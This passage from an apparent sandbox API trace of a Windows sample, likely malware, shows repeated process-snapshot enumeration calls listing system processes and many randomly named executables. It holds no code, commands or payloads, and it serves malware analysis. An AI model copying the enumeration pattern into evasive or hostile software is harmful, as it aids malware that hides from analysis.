cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0134.227] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0134.228] CloseHandle (hObject=0xbc) returned 1 [0134.228] Sleep (dwMilliseconds=0x12c) [0134.575] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0134.579] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.580] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0134.581] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0134.581] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.582] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0134.583] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.583] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0134.584] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0134.585] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0134.585] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0134.586] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.587] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.587] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.588] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.588] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.589] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0134.590] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.590] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.591] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0134.592] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.593] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.594] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0134.596] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0134.597] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0134.598] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.599] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.600] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0134.601] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0134.602] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0134.603] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0134.604] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0134.606] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0134.607] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0134.608] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0134.609] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0134.610] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0134.611] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0134.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0134.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0134.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0134.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0134.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0134.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0134.618] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0134.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0134.620] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0134.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0134.701] CloseHandle (hObject=0xc4) returned 1 [0134.701] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0134.706] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0134.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0134.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.708] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0134.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0134.710] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0134.711] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0134.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0134.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.713] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0134.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0134.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.720] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0134.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0134.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0134.724] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0134.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0134.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0134.730] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0134.740] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0134.741] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0134.742] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 